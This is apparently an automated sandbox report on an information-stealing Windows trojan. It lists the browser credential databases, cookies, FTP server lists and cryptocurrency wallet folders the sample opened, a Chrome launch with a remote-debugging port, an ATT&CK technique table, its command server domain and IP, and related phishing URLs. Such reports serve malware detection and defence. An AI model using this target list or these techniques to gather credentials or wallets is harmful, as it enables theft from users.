                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\temporary\key4.db
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionstore-backups\key4.db
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\bookmarkbackups\key4.db
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\2023-10\key4.db
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\to-be-removed\key4.db
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\db\key4.db
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\events\key4.db
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\security_state\key4.db
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\key4.db
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\key4.db
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\key4.db
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\key4.db
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\pending_pings\key4.db
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\key4.db
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\key4.db
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\saved-telemetry-pings\key4.db
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\minidumps\key4.db
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\events\key4.db
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\default\key4.db
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\tmp\key4.db
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\key4.db
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\key4.db
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                  Source: Yara matchFile source: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: gVKsiQIHqe.exe PID: 5564, type: MEMORYSTR

                  Remote Access Functionality

                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                  Source: Yara match File source: gVKsiQIHqe.exe, type: SAMPLE
                  Source: Yara match File source: sslproxydump.pcap, type: PCAP
                  Source: Yara match File source: 0.2.gVKsiQIHqe.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.0.gVKsiQIHqe.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: Process Memory Space: gVKsiQIHqe.exe PID: 5564, type: MEMORYSTR
                  | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                  |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
                  | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 3 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
                  | Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Create Account | 1 Extra Window Memory Injection | 1 Obfuscated Files or Information | 1 Credentials in Registry | 1 Account Discovery | Remote Desktop Protocol | 4 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
                  | Email Addresses | DNS Server | Domain Accounts | At | 1 Registry Run Keys / Startup Folder | 11 Process Injection | 1 DLL Side-Loading | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Remote Access Software | Automated Exfiltration | Data Encrypted for Impact |
                  | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Registry Run Keys / Startup Folder | 1 Extra Window Memory Injection | NTDS | 34 System Information Discovery | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
                  | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 11 Query Registry | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
                  | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 11 Process Injection | Cached Domain Credentials | 111 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                  | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 12 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                  | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
                  [Behavior Graph (figure not reproduced). ID: 1579643, Sample: gVKsiQIHqe.exe, Start date: 23/12/2024, Architecture: WINDOWS, Score: 100]

                  | Source | Detection | Scanner | Label | Link |
                  |---|---|---|---|---|
                  | gVKsiQIHqe.exe | 71% | ReversingLabs | Win32.Trojan.Generic | |
                  | gVKsiQIHqe.exe | 66% | Virustotal | | Browse |
                  | gVKsiQIHqe.exe | 100% | Joe Sandbox ML | | |
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                                                                                                                                                                  high
                                                                                                                                                                  https://www.tiktok.com/22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://www.msn.com/web-notification-icon-light.png2cc80dabc69f58b6_1.8.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.0gVKsiQIHqe.exefalse
                                                                                                                                                                        high
                                                                                                                                                                        https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refgVKsiQIHqe.exe, 00000000.00000002.3279528745.0000000003861000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3282727339.0000000003D2B000.00000004.00000020.00020000.00000000.sdmp, P8QIEK.0.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://chromewebstore.google.com/manifest.json.8.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://toptek.sbsLgVKsiQIHqe.exe, 00000000.00000003.2182794313.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2159778858.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2136596428.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2113133100.00000000008B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              https://drive-preprod.corp.google.com/manifest.json0.8.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://srtb.msn.cn/2cc80dabc69f58b6_1.8.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://toptek.sbsDatagVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477gVKsiQIHqe.exe, 00000000.00000002.3279528745.0000000003861000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3282727339.0000000003D2B000.00000004.00000020.00020000.00000000.sdmp, P8QIEK.0.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://msn.comXIDv10Cookies.9.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://www.onenote.com/stickynotes?isEdgeHub=true&auth=222db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://www.onenote.com/stickynotes?isEdgeHub=true&auth=122db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://chrome.google.com/webstore/manifest.json.8.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://y.music.163.com/m/22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://unitedstates2.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.8.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://bard.google.com/22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://assets.msn.cn/resolver/2cc80dabc69f58b6_1.8.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://toptek.sbsosh;gVKsiQIHqe.exe, 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://browser.events.data.msn.com/2cc80dabc69f58b6_1.8.drfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://t.me/gVKsiQIHqe.exe, 00000000.00000002.3277818216.000000000083E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://toptek.sbs/HgVKsiQIHqe.exe, 00000000.00000003.2136596428.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2113133100.00000000008B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://web.whatsapp.com22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://toptek.sbs/LgVKsiQIHqe.exe, 00000000.00000003.2182794313.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2086247436.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2087328305.00000000008B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  https://web.telegram.orggVKsiQIHqe.exe, 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3277818216.0000000000881000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://m.kugou.com/22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://www.office.com22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://outlook.live.com/mail/0/22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://toptek.sbs/LGgVKsiQIHqe.exe, 00000000.00000003.2086247436.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2087328305.00000000008B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            https://toptek.sbs/OgVKsiQIHqe.exe, 00000000.00000002.3277818216.000000000089D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiP8QIEK.0.drfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://ntp.msn.com/edge/ntp2cc80dabc69f58b6_1.8.dr, 000003.log0.8.drfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  http://www.microsoft.xZgVKsiQIHqe.exe, 00000000.00000003.2182794313.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2086247436.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2159778858.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2087328305.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2136596428.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2113133100.00000000008B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    https://assets.msn.com/resolver/2cc80dabc69f58b6_1.8.drfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      https://powerpoint.new?from=EdgeM365Shoreline22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=gVKsiQIHqe.exe, 00000000.00000002.3280611239.0000000003B2E000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3279528745.000000000389E000.00000004.00000020.00020000.00000000.sdmp, GV3W4E.0.dr, 4W4EKN.0.dr, Web Data.8.drfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          https://toptek.sbsQQ16FUSJgVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                            https://tidal.com/22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                              https://ntp.msn.com000003.log7.8.dr, 2cc80dabc69f58b6_0.8.drfalse
                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                https://browser.events.data.msn.cn/2cc80dabc69f58b6_1.8.drfalse
                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                  https://gaana.com/22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                                                                                                                                                                                    high
IP, Domain, Country, Flag, ASN, ASN Name, Malicious
                                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                    23.209.72.7
                                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                                    20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                    23.44.201.28
                                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                                    20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                    239.255.255.250
                                                                                                                                                                                                                                                    unknownReserved
                                                                                                                                                                                                                                                    unknownunknownfalse
                                                                                                                                                                                                                                                    94.130.188.57
                                                                                                                                                                                                                                                    toptek.sbsGermany
                                                                                                                                                                                                                                                    24940HETZNER-ASDEfalse
                                                                                                                                                                                                                                                    18.165.220.110
                                                                                                                                                                                                                                                    sb.scorecardresearch.comUnited States
                                                                                                                                                                                                                                                    3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                                    IP
                                                                                                                                                                                                                                                    192.168.2.5
                                                                                                                                                                                                                                                    127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579643
Start date and time: 2024-12-23 06:56:24 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 37s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: gVKsiQIHqe.exe (renamed because original name is a hash value)
Original Sample Name: 2e45d5934db7da8ff7b560a80ceb96ab.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@63/316@26/17
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 56
• Number of non-executed functions: 46
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Report size getting too big, too many NtWriteFile calls found.
• Report size getting too big, too many NtWriteVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
No simulations
                                                                                                                                                                                                                                                                              https://postoffice.adobe.com/po-server/link/redirect?target=eyJhbGciOiJIUzUxMiJ9.eyJ0ZW1wbGF0ZSI6ImNjX2NvbGxhYl9kY3NoYXJpbmdfdmlld19lbWFpbCIsImVtYWlsQWRkcmVzcyI6InJlc3VsdDMxNzdAZ21haWwuY29tIiwicmVxdWVzdElkIjoiZmE2MjkzNzktOGVlOS00ZDkxLTU2NGYtODZlN2Q1MjBhMTgxIiwibGluayI6Imh0dHBzOi8vYWNyb2JhdC5hZG9iZS5jb20vaWQvdXJuOmFhaWQ6c2M6VkE2QzI6NTIyMzBiMDgtOTVhMi00YWM0LWE1NzUtODJlOGU4OGQ0ZDQxIiwibGFiZWwiOiIxMSIsImxvY2FsZSI6ImVuX1VTIn0.6QK9gd12KmAWhogZmxgLuCkLGY2E_zrbMQmdhhDyRIOYPSXcqy0OWeli3WNWeGYHCbKTmQtprFT1CJf99ywr0gGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                                                                                                                                                                https://ddec1-0-en-ctp.trendmicro.com:443/wis/clicktime/v1/query?url=https%3a%2f%2facrobat.adobe.com%2fid%2furn%3aaaid%3asc%3aVA6C2%3a2a138187%2d69c4%2d4ab4%2d842d%2dee0003585bc9&umid=48a0bf19-c23f-4ede-a21a-c8110fd2ff5e&auth=3396b606d81544f1fa36c033f23b9c9aa919296a-56125daf7e96fa7cc3eab78dc35383db072b630fGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                  https://acrobat.adobe.com/id/urn:aaid:sc:EU:0b83ebe6-92d6-4f29-9c78-2fc411750345Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                                                                                    CLOUDFLARENETUSEI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                                                                                                                                    6S7hoBEHvr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                    • 172.67.157.254
                                                                                                                                                                                                                                                                                    DHL AWB-documents.lnkGet hashmaliciousDivulge StealerBrowse
                                                                                                                                                                                                                                                                                    • 162.159.138.232
                                                                                                                                                                                                                                                                                    Rokadernes.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                                                                                    • 104.21.86.72
                                                                                                                                                                                                                                                                                    uZO96rXyWt.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                    • 104.21.66.86
                                                                                                                                                                                                                                                                                    trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                                                                                                    fKdiT1D1dk.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                    • 104.16.249.249
                                                                                                                                                                                                                                                                                    fKdiT1D1dk.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                    • 104.16.248.249
                                                                                                                                                                                                                                                                                    https://clicks.icims.com/f/a/5aA63l6Vdy8mmO6SfnFRFQ~~/AAIB5gA~/RgRpSzdjP0SjaHR0cHM6Ly9sb2dpbi5pY2ltcy5jb20vdS9yZXNldC12ZXJpZnk_dGlja2V0PVYzbldUZVAzTUxqc0hwVzlXOFlZbFhxamh5SFJZR0tHI2NsaWVudElkPUtKQTk1RHhIT1BOTzU2VWFOUmRSWTU3cHpuNkNNSGNtJmNsaWVudE5hbWU9QXBwbGljYW50IFRyYWNraW5nJmNhbGxiYWNrVXJsPVcDc3BjQgpnZWOyaGeuoGU9UhltaWthLnlhbWFndWNoaUBoYXlzLmNvLmpwWAQAABLwGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    • 162.247.243.29
                                                                                                                                                                                                                                                                                    http://217.28.130.10/8265/568747470733a2f2f6d61696c2d6864656c2e6c7664642e696e666f2f3f656d61696c3d62722e73756e67406864656c2e636f2e6b72Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    • 172.67.191.167
                                                                                                                                                                                                                                                                                    MIT-GATEWAYSUStrZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                    • 18.165.220.110
                                                                                                                                                                                                                                                                                    armv4l.elfGet hashmaliciousUnknownBrowse
